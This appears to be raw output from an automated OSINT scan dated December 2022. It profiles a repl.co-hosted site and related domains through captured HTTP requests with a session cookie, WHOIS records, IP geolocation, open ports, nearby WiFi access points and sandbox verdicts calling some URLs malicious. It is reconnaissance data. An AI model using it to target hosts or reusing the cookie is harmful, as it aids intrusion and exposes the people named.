1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/font-awesome/css/font-awesome.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/css/familiard7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/familiard7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/bootstrap/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/bootstrap/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, 
*/*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/css/commonsd7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/commonsd7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/css/datepicker.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/datepicker.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 
f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/css/familiar_margind7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/familiar_margind7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/bootstrap-select/css/bootstrap-select.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/bootstrap-select/css/bootstrap-select.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET 
/resources/css/datepicker3.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/datepicker3.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GE 2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 2 0 None 8075 40.112.0.0/13 2022-12-18 00:04:02 Physical Location No ipstack 0 0 2 0 None United States 104.21.7.179 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2053 188.114.97.1 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 188.114.96.9 2022-12-18 00:13:48 Web Content Language No Language Detector 0 0 3 0 None English 403 Forbidden

Forbidden

You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

2022-12-18 00:19:05 Raw Data from RIRs No ipapi.co 0 0 3 0 None {u'region_code': u'52', u'country_tld': u'.it', u'ip': u'81.88.48.101', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 60431283, u'country_code': u'IT', u'timezone': u'Europe/Rome', u'city': u'Florence', u'network': u'81.88.48.0/24', u'languages': u'it-IT,de-IT,fr-IT,sc,ca,co,sl', u'version': u'IPv4', u'latitude': 43.7891, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Italy', u'country_capital': u'Rome', u'org': u'Register S.p.A.', u'postal': u'50135', u'asn': u'AS39729', u'country': u'IT', u'region': u'Tuscany', u'longitude': 11.2356, u'country_calling_code': u'+39', u'country_area': 301230.0, u'country_code_iso3': u'ITA'} 81.88.48.101 2022-12-18 00:21:44 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b2ce246b792a2d-ORD Content-Encoding: gzip 2606:4700:3031::6815:7b3 2022-12-18 00:56:42 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@godaddy.com Domain Name: MISOGYNY.NET Registry Domain ID: 1847059997_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.godaddy.com Registrar URL: http://www.godaddy.com Updated Date: 2022-09-15T18:46:12Z Creation Date: 2014-02-18T03:58:20Z Registry Expiry Date: 2023-02-18T03:58:20Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: 480-624-2505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited 
https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS71.DOMAINCONTROL.COM Name Server: NS72.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:56:31Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. 
You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: MISOGYNY.NET Registry Domain ID: 1847059997_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-02-18T09:18:55Z Creation Date: 2014-02-17T22:58:20Z Registrar Registration Expiration Date: 2023-02-17T22:58:20Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: Not Available From Registry Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=MISOGYNY.NET Registry Admin ID: Not Available From Registry Admin Name: Registration Private Admin Organization: 
Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=MISOGYNY.NET Registry Tech ID: Not Available From Registry Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=MISOGYNY.NET Name Server: NS71.DOMAINCONTROL.COM Name Server: NS72.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:56:41Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. 
In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. 2022-12-18 00:09:36 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.12:80 188.114.96.0/24 2022-12-18 00:03:09 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.229 81.88.52.232 2022-12-18 00:27:14 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.48.102:80 81.88.48.102 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None kingj73664liv.hbinging.repl.co 34.149.204.188 2022-12-18 00:04:00 Physical Location No ipstack 0 0 1 0 None Netherlands 20.224.2.213 2022-12-18 00:09:54 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 188.114.97.0 2022-12-18 00:12:28 Physical Location No ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3032::ac43:8925 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None infoworld (Net ID: 00:02:2D:01:DD:9B) 37.7803446,-122.3906132 2022-12-18 00:14:14 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.144:8443 188.114.96.0/24 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WestEd (Net ID: 00:02:2D:05:7E:85) 37.780462,-122.390564 2022-12-18 00:27:44 Similar Domain - Whois No Whois 0 0 2 0 None % TCI Whois Service. 
Terms of use: % https://tcinet.ru/documents/whois_ru_rf.pdf (in Russian) % https://tcinet.ru/documents/whois_su.pdf (in Russian) domain: PLAGUE.RU nserver: ns3.salenames.ru. nserver: ns4.salenames.ru. state: REGISTERED, DELEGATED, VERIFIED org: NALIM DEVELOPMENT LTD. taxpayer-id: - registrar: RU-CENTER-RU admin-contact: https://www.nic.ru/whois created: 2019-04-30T14:00:38Z paid-till: 2023-04-30T14:00:38Z free-date: 2023-05-31 source: TCI Last updated on 2022-12-18T00:26:30Z plague.ru 2022-12-18 00:13:48 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None registryinfo@eurodns.com %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: putain.fr status: ACTIVE eppstatus: active hold: NO holder-c: ES5624-FRNIC admin-c: ES5623-FRNIC tech-c: AA4055-FRNIC registrar: EURODNS S.A. Expiry Date: 2023-05-04T07:57:38Z created: 2009-01-15T07:26:19Z last-update: 2022-06-20T12:09:11Z source: FRNIC nserver: ns1.eurodns.com nserver: ns2.eurodns.com source: FRNIC registrar: EURODNS S.A. address: Array address: L-3372 LEUDELANGE country: LU phone: +352.2637251 e-mail: registryinfo@eurodns.com website: http://www.eurodns.com anonymous: No registered: 2003-09-22T00:00:00Z source: FRNIC nic-hdl: AA4055-FRNIC type: PERSON contact: Anouar Adlani address: EuroDNS SA address: 24 rue Leon Laval address: L-3372 Leudelange country: LU phone: +352.2637252 fax-no: +352.26372537 e-mail: staff@eurodns.com registrar: EURODNS S.A. changed: 2022-12-16T09:25:25.326593Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ES5624-FRNIC type: ORGANIZATION contact: EuroDNS S.A. address: EuroDNS S.A. 
address: 2, rue Leon Laval address: L-3372 Leudelange country: LU phone: +352.263725200 fax-no: +352.26372537 e-mail: domregteam3@eurodns.com registrar: EURODNS S.A. changed: 2015-09-24T11:47:25Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ES5623-FRNIC type: ORGANIZATION contact: EuroDNS S.A. address: EuroDNS S.A. address: 2, rue Leon Laval address: L-3372 Leudelange country: LU phone: +352.263725200 fax-no: +352.26372537 e-mail: domregteam3@eurodns.com registrar: EURODNS S.A. changed: 2015-09-24T11:47:26Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.410349Z <<< 2022-12-18 00:14:47 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.160:8443 188.114.96.0/24 2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b1356f9f1a22f3-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.97.0 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77a93603eeb32276-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": 
["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:24:54 Physical Location No MetaDefender 0 0 1 0 None Campinas, Brazil 4.228.83.86 2022-12-18 00:04:10 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None sni.cloudflaressl.com 188.114.96.0 2022-12-18 00:04:54 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 6, u'search_terms': [{u'id': u'host', u'value': u'172.67.190.129'}], u'result': [{u'environment_id': 100, u'job_id': u'62392540ce653272b54a6d6b', u'analysis_start_time': u'2022-03-22 01:31:16', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 64, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'0844954242dad2f119265734fe4ce35a69c524081cd94c1b502ff9cb5b50f243', u'type': None, u'type_short': u'url', u'size': 87}, {u'environment_id': 100, u'job_id': u'6239253df9e775075438cc9c', u'analysis_start_time': u'2022-03-22 01:31:16', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'81bb9977fb1855ac189a2501de9ea84919c9f9a3cb275a611d4e3a7c2365e3ff', u'type': None, u'type_short': u'url', u'size': 90}, {u'environment_id': 100, u'job_id': u'6239253a7df9d155843e2d8c', u'analysis_start_time': u'2022-03-22 01:31:16', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'59eba9b87796e94608f3f13824e66c1c4deb89a8ad9769b2bba7bf26dd04218d', u'type': None, u'type_short': u'url', u'size': 93}, {u'environment_id': 100, u'job_id': u'6239253876aa6e52ac1355d1', u'analysis_start_time': u'2022-03-22 01:35:37', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 69, u'verdict': u'malicious', u'submit_name': 
u'sample.url', u'sha256': u'8720302e50a9a4ae897b8f151d004c72e255a39fe5901fc74cf3a028b8161ca0', u'type': None, u'type_short': u'url', u'size': 129}, {u'environment_id': 120, u'job_id': u'5f7576858d9ea776a351e17c', u'analysis_start_time': u'2020-10-01 06:26:16', u'vx_family': None, u'av_detect': None, u'environment_description': u'Windows 7 64 bit', u'threat_score': 28, u'verdict': u'suspicious', u'submit_name': u'httpswww.schooltube.commediat1_m2o42vv0.url', u'sha256': u'00a267a2db140e1c7cb056f4a77731268c1c63acf5805deee5e797b7a240eeaf', u'type': None, u'type_short': u'url', u'size': 69}, {u'environment_id': 100, u'job_id': u'5f66f29d58422553d4701153', u'analysis_start_time': u'2020-09-20 06:11:54', u'vx_family': None, u'av_detect': None, u'environment_description': u'Windows 7 32 bit', u'threat_score': 40, u'verdict': u'suspicious', u'submit_name': u'httpswww.prisonfellowship.orgmemberswatch-the-new-mutants-online-full-movie-123movies.url', u'sha256': u'2ae5ff40f1370260f53606f5bbc625b36a8cbba6fffe6a2fd83f59a7b1afa30c', u'type': None, u'type_short': u'url', u'size': 114}]} 172.67.190.129 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None galiciaenlinea-1.larescomco.repl.co 34.149.204.188 2022-12-18 00:21:27 BGP AS Membership No Censys 0 0 2 0 None 13335 2606:4700:3037::6815:13f3 2022-12-18 00:08:42 Internet Name No DNS Resolver 0 0 2 0 None rasputain.fr [{u'not_after': u'2023-01-26T16:20:04', u'not_before': u'2022-10-28T16:20:05', u'issuer_ca_id': 183267, u'name_value': u'rasputain.fr', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'rasputain.fr', u'serial_number': u'032ccd9b506502e8a966931197338fe3ed9b', u'entry_timestamp': u'2022-10-28T17:20:06.061', u'id': 7853975575}, {u'not_after': u'2023-01-26T16:20:04', u'not_before': u'2022-10-28T16:20:05', u'issuer_ca_id': 183267, u'name_value': u'rasputain.fr', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'rasputain.fr', u'serial_number': 
u'032ccd9b506502e8a966931197338fe3ed9b', u'entry_timestamp': u'2022-10-28T17:20:05.902', u'id': 7854216619}, {u'not_after': u'2023-01-17T23:59:59', u'not_before': u'2022-01-17T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.rasputain.fr\nrasputain.fr', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'0f0e0e28f1c6cb2fce671da6c8b87ab2', u'entry_timestamp': u'2022-01-17T01:18:02.657', u'id': 5993549914}] 2022-12-18 00:16:33 Physical Location No numverify 0 0 3 0 None Bellevue, US +14259744689 2022-12-18 00:11:58 Raw Data from RIRs No ipapi.co 0 0 1 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'40.113.112.131', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'40.113.96.0/19', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'postal': u'1012', u'asn': u'AS8075', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 40.113.112.131 2022-12-18 00:10:04 Linked URL - Internal No URLScan.io 1 0 1 0 None https://misogyny.wtf/ misogyny.wtf 2022-12-18 00:31:32 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.link Registry Domain ID: DO_00981b8bafad29479f36ae1c8b278bf9-UR Registrar WHOIS Server: whois.tucows.com Registrar URL: www.tucowsdomains.com Updated Date: 2022-04-21T15:39:25.047Z Creation Date: 2022-04-16T15:38:41.261Z Registry Expiry Date: 2023-04-16T15:38:41.261Z Registrar: Tucows Domains Inc. 
Registrar IANA ID: 69 Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +1.4165350123 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Data Protected Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
